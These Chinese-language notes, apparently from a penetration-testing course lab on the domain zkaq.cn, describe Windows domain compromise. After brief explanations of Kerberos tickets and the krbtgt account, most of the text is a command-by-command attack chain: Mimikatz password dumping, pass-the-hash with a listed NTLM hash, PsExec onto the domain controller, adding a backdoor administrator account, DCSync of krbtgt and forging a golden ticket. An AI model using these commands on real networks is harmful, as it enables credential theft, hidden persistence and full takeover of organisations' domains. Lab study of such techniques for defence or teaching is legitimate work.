域其实就是一些计算机所组成的。一个电脑也能是一个域,一堆电脑也可以是一个域。
域控账号可以登录域内任意主机
在域中一台电脑上要登录另一台的用户,需要一个通信证,这个通行证就叫做票据。例如:你用域管账户登录
域控管理员会用自己的域控账号登录客户机,那么我们就可以抓取到域控的账号和密码。但是密码并不一定抓取到的都是明文,如果是Windows server 2012以上版本或者是打了KB2871997补丁就会抓取不到明文密码,虽然有密文,但是密文是是不可逆的,基本上不可能解开
在登陆其他用户的时候,也会这样去计算类似的情况,所以你用哈希值就可以去登陆同密码的服务器,然后因为这里是域控的账号密码,那么你可以直接用这个去登陆域控
krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码,我们拿着那个的票据,去访问客户机,客户机会认为我们是KDC秘钥分发中心,所以直接给了最高的权限允许我们访问,一般管理员会修改域控机密码,但是很少有管理员会修改Krbtgt的密码。那我们看看怎么伪造这个黄金票据。
能够使用域控的cmd
这里跳过内网渗透,写怎么拿到域控
systeminfo 查看计算机信息
arp -a 查看内网ip
登入10.0.1.8
猕猴桃基础命令
privilege::debug 提权
sekurlsa::logonpasswords 抓密码
取出哈希值,用哈希传递的办法直接构建密码去登陆
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
dir \\DC.zkaq.cn\c$(查看域控共享文件中的c盘里的内容)
\\:UNC路径(共享文件)
DC:登陆的主机名
cd ../../
cd users
cd administrator
cd Desktop
PsExec.exe \\DC.zkaq.cn cmd
添加用户abc
net user abc a1b2c3!.qa /add
将abc加入管理员组
net localgroup administrators abc /add
查看abc是否在管理员组
net localgroup administrators
lsadump::dcsync /user:krbtgt
sid:S-1-5-21-4098506371-3349406080-1400905760
hashNTLM:9f7afad7acc9f72b7e338b908795b7da
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:951.kiribi
kerberos::ptt 951.kiribi
/dir \\DC.zkaq.cn\c$